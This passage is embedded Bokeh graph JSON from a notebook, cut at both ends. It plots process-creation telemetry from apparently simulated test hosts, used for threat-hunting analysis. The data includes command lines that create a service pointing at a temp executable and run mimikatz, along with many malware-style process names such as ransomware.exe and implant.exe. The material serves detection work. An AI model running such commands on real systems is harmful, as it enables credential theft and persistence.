create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\", sc delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\"tasklist\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\"],\"ParentProcessName\":[null,\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe, C:\\\\Windows\\\\System32\\\\cmd.exe, C:\\\\Windows\\\\System32\\\\Dism.exe, C:\\\\Windows\\\\System32\\\\vssadmin.exe, C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe, C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",null,\"C:\\\\Windows\\\\System32\\\\cmd.exe, C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe, C:\\\\Windows\\\\System32\\\\cmd.exe, C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe, C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe, C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe, C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe, C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe, C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe, C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe, C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe, C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe, C:\\\\Windows\\\\Fonts\\\\csrss.exe, C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe, C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe, C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\"],\"SubjectDomainName\":[\"WORKGROUP\",null,null,null,null,\"MSTICAlertsWin1\",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],\"SubjectLogonId\":[\"0x3e7\",null,null,null,null,\"0xfaac27\",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],\"index\":[\"MSTICAlertsWin1$\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"MSTICAdmin\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\"],\"node_color\":[\"lightblue\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightblue\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\",\"lightgreen\"],\"node_role\":[\"source\",\"target\",\"target\",\"target\",\"target\",\"source\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\",\"target\"],\"node_type\":[\"SubjectUserName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"SubjectUserName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\",\"NewProcessName\"]},\"selected\":{\"id\":\"5991\"},\"selection_policy\":{\"id\":\"5990\"}},\"id\":\"5801\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"5771\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"5785\",\"type\":\"PanTool\"},{\"attributes\":{\"coordinates\":null,\"edge_renderer\":{\"id\":\"5806\"},\"group\":null,\"inspection_policy\":{\"id\":\"5845\"},\"layout_provider\":{\"id\":\"5812\"},\"node_renderer\":{\"id\":\"5802\"},\"selection_policy\":{\"id\":\"5843\"}},\"id\":\"5799\",\"type\":\"GraphRenderer\"},{\"attributes\":{},\"id\":\"5773\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"5775\",\"type\":\"LinearScale\"},{\"attributes\":{\"source\":{\"id\":\"5801\"}},\"id\":\"5803\",\"type\":\"CDSView\"},{\"attributes\":{\"data\":{\"TimeGenerated\":[\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\",\"2019-01-15 05:15:03.017\",\"2019-01-15 04:44:37.180\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:14.453\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:45:28.157\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:12:25.403\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:28:33.090\",\"2019-01-15 04:23:43.103\",\"2019-01-15 05:02:28.260\",\"2019-01-15 04:45:24.523\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.770\"],\"end\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"MSTICAdmin\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\"],\"start\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\"]},\"selected\":{\"id\":\"5993\"},\"selection_policy\":{\"id\":\"5992\"}},\"id\":\"5805\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"Data Graph\"},\"id\":\"5767\",\"type\":\"Title\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"5986\"},\"group\":null,\"major_label_policy\":{\"id\":\"5987\"},\"ticker\":{\"id\":\"5778\"}},\"id\":\"5777\",\"type\":\"LinearAxis\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"5983\"},\"group\":null,\"major_label_policy\":{\"id\":\"5984\"},\"ticker\":{\"id\":\"5782\"}},\"id\":\"5781\",\"type\":\"LinearAxis\"},{\"attributes\":{\"fill_color\":{\"value\":\"#abdda4\"},\"size\":{\"value\":25}},\"id\":\"5833\",\"type\":\"Circle\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"text_font_size\":\"7pt\",\"x\":-0.21287141056931583,\"x_offset\":5,\"y\":0.9870996903313551,\"y_offset\":5},\"id\":\"5927\",\"type\":\"Label\"},{\"attributes\":{\"bottom_units\":\"screen\",\"coordinates\":null,\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"group\":null,\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"5989\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5801\"},\"glyph\":{\"id\":\"5828\"},\"group\":null,\"hover_glyph\":{\"id\":\"5833\"},\"selection_glyph\":{\"id\":\"5838\"},\"view\":{\"id\":\"5803\"}},\"id\":\"5802\",\"type\":\"GlyphRenderer\"}],\"root_ids\":[\"5766\"]},\"title\":\"Bokeh Application\",\"version\":\"2.4.2\"}};\n const render_items = [{\"docid\":\"542a4f9d-44be-420f-92b7-84c14e942bef\",\"root_ids\":[\"5766\"],\"roots\":{\"5766\":\"6a8740fb-eb85-4cbd-9469-16b7ebed93c7\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n let attempts 